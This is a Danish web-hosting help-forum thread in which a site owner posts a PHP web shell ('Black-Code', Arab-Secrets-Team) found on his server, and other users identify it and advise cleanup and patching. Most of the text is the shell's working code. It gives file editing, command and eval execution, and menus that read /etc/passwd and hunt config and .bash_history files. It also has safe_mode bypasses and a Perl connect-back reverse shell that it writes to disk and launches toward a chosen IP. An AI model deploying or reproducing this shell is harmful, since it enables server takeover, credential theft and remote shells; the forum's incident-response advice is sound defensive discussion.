print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";
input ("text","renf","New-name",20);print " ";
input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){
print"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Can't rename the file ]</div>";
print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Back </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
print "<div><b>[ Editing <font color=olive>".basename($_REQUEST['edit'])."</font> ] [<a href='java script:history.back()'> Back </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";
print $sf."<textarea cols=157 rows=23 name=edittxt>";
$alltxt= file_get_contents($_REQUEST['edit']);
$nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";
if (is_writable($_REQUEST['edit'])){
print "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit
<font color=olive>".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
$nedittxt=stripslashes($_REQUEST['edittxt']);
fwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=olive>".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}
if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))
{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))
{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid);
$fileowner=$fileownerarray['name']; $fileg=filegroup($file);
$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){
if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}
elseif(isset($_REQUEST['mve'])){
if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}
}else {$cpmvmess="Choose file to Copy/Move";}
if (isset ($_REQUEST['safefile'])){
$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
if(empty($_GET['file'])){if(empty($_POST['file'])){
print "<center>[ Please choose a file first to read it using copy() ]</center>";
} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
ini_restore("safe_mode");ini_restore("open_basedir");
print "<center><pre>".$sta;
if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
function callback($nscdir,$bip,$bport){
if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
if (is_writable($nscdir)){
$fp=fopen ("back.pl","w");$backpl='back.pl';}
else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
fwrite ($fp,"use Socket;
\$system='$epath';
\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";
echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
echo \"[ User perms ][$]\";echo \"`id`\";echo;
echo \"[ Start shell ][$]\";';

if (!\$ARGV[0]) {
  exit(1);
}
\$host = \$ARGV[0];
\$port = 80;
if (\$ARGV[1]) {
  \$port = \$ARGV[1];
}
\$proto = getprotobyname('tcp') || die('Unknown Protocol\n');
socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
my \$target = inet_aton(\$host);
if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
  die('Unable to Connect\n');
}
if (!fork( )) {
  open(STDIN,'>&SERVER');
  open(STDOUT,'>&SERVER');
  open(STDERR,'>&SERVER');
print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]';
print '\n[ A-S-T team ][ Lezr.com ]\n\n';
        system(\$sys);system (\$system);
          exit(0); }
          ");callfuncs("chmod 777 $backpl");
ob_start();
callfuncs("perl $backpl $bip $bport");
ob_clean();
print "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
[ Check your connection now, if failed try changing the port number ]<br>
[ Or Go to a writable dir and then try to connect again ]<br>
[ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]
</div><br>";}if (isset($_REQUEST['uback'])){
$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip'];
if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}
elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
delm(": Command execution :");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100% height=18%>";
print "<tr><td width=32%><div align=left>";
print $st.$c1."<center><div><b>".$mess3.$ec;
print $c2.$sf."<center>";input("text","cfile","",53);
input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","crefile","Create-F","");
print " ";input("submit","delfile","Delete-F","");
print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>".$st.$c1;
print "<center><div><b>Enter the command to execute";print $ec;
print $c2.$sf."<center><div style='margin-top:7px'>";
input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
input("submit","","Execute","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td width=32%><div align=right>";print $st.$c1;
print "<center><div><b>$mess".$ec.$c2.$sf."<center>";
input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","credir","Create-D","");print " ";
input("submit","deldir","Delete-D","");
print "</center>".$ef.$ec.$et."</div></td></tr>";
print "<tr><td width=32%><div align=left>";print $st.$c1;
print "<center><div><b>Edit/Read file".$ec;print $c2.$sf."<center>";
input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","","Edit-Read","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>";print $st.$c1;
print "<center><div><b>Show Directory<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
input("submit","","Show","");print " ";
input("reset","","Reset","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>";print $st.$c1;
print "<center><div><b>File-size : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>";
input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
input("hidden","up",$nscdir,0);
print"<br>";input("submit","","Upload","");print "</center>".$ef.$ec.$et."</div></td></tr>";
delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Execute php code with eval()</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
print "&nbsp;<textarea cols=73 rows=3 name=eval>";
if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
print "</textarea><br><center>";
input('submit','evsub','Execute');print " ";
input('Reset','','Reset');print " ";
print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=center>";
print $st.$c1."<div><b><center>Execute useful commands</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
print "<center><select style='width:60%' name=uscmnds size=1>
<option value='op0'>Execute quick commands</option>
<option value='op1'>ls -lia</option>
<option value='op2'>/etc/passwd</option>
<option value='op3'>/var/cpanel/accounting.log</option>
<option value='op4'>/var/named</option>
<option value='op11'>Perms in curr Dir</option>
<option value='op12'>Perms in main Dir</option>
<option value='op5'>Find service.pwd files</option>
<option value='op6'>Find config files</option>
<option value='op7'>Find .bash_history files</option>
<option value='op8'>Read hosts file</option>
<option value='op9'>Root login</option>
<option value='op10'>Show opened ports</option>
<option value='op13'>Show services</option>
</select> ";print"<input type=submit name=subqcmnds value=Execute style='height:20'> <input type=reset value=Return style='height:20'></center>";
print $ec.$ef.$et."</td></tr></table>";delm("");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>".$cpmvmess."</div>";
print $ec.$c2.$sf."&nbsp;";input("text","ftcpy","File-name",15);
print "<b><font face=tahoma size=2>&nbsp;To </b>";
input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
input("submit","cpy","Copy","");print " ";input("submit","mve","Move","");
print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=right>";
print $st.$c1."<div><b><center>Use most useful tools&cmds</div>";
print $ec.$c2.$sf."&nbsp";input("hidden","scdir",$nscdir,0);
print "<select style='width:22%' name=ustools size=1>
<option value='t1'>Wget</option><option value='t2'>Curl</option>
<option value='t3'>Lynx</option><option value='t9'>Get</option>
<option value='t4'>Unzip</option><option value='t5'>Tar</option>
<option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
<option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "</center>".$ec.$ef.$et;
print "</td></tr></table>";delm(": Safe mode bypass :");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Using copy() function</div>";
print $ec.$c2.$sf."&nbsp;";input("text","safefile",$nscdir,75);
input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=right>";
print $st.$c1."<div><b><center>Using ini_restore() function</div>";
print $ec.$c2.$sf."&nbsp;";input("text","inifile",$nscdir,75);
input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
print "</td></tr></table>";delm(": Backdoor connection :");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Connect with back backdoor</div>";
print $ec.$c2.$sf."&nbsp;";input("text","bip",$REMOTE_ADDR,47);print " ";
input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Connect","");print " ";input("reset","","Reset","");
print "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Uploaded backdoor</div>";
print $ec.$c2.$sf."&nbsp;";print "<select style='width:15%' name=upports size=1>
<option value='up80'>80</option><option value='up443'>443</option>
<option value='up2121'>2121</option></select>";print " ";
input("text","uback","back.pl",23);print " ";
input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect");
print "</center>".$ec.$ef.$et;print "</td></tr></table>";
print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";
print"<center>Copyright © is reserved to Black-C0de 2006 <br>[ Arab-Secrets-Team :: Go to : <a target='_blank' href='http://www.lezr.com'>Http://Lezr.com</a> ]";
print"</font></td></tr></table>";
?>
Avatar billede johnnydamtoft Nybegynder
15. august 2009 - 10:59 #5
Ved hurtig læsning, ligner det et script som åbner en terminal eller forsøger at gøre det. Eller måske endda udfører kommandoer på webserveren.

Igen, ud med lortet :) og start forfra med dine data. Det er det mest sikre.
Avatar billede poulvp Praktikant
15. august 2009 - 11:23 #6
har omdøbt filen og lader den ligge til ejerne af mit webhotel har set den, så må de afgøre om de vil gøre noget ved det.
Avatar billede bufferzone Praktikant
15. august 2009 - 15:16 #7
Du mangler det vigtigste. Du bør gøre følgende:

1. Hvis du bruger et færdigt CMS system som f.eks. Jommla så bør du kontrollerer den version du anvender og se om der ikke er kommet en opdatering. Hackeren er kommet ind gennem et hul i dit system, og hvis du ikke fjerner dette hul, så kommer han bare tilbage efter at du har ændret dine passwords.

2. Hvis du selv har lavet dine ting eller købt et specialsystem, bør du finde den sårbarhed hackeren har anvendt og det kan godt være svært. Der er sikkert tale om noget injection eller brug af upload funktionalitet.

3. herefter skal du genskabe dit ny opdaterede system, herunder anbefaler jeg dig at ændre default placering og mappe struktur hvis det kan gøres.

4. ændring af default og gamle passwords på dit syustem

5. forøget logging så du har en chance for at se hvordan hackeren kommer ind hvis du nu ikke helt har fået fjernet hullet.

Det er ikke nok at starte forfra hvis du ikke kan fjerne hullet, det hjælper intet og du vil have hackeren tilbage i løbet af ingen tid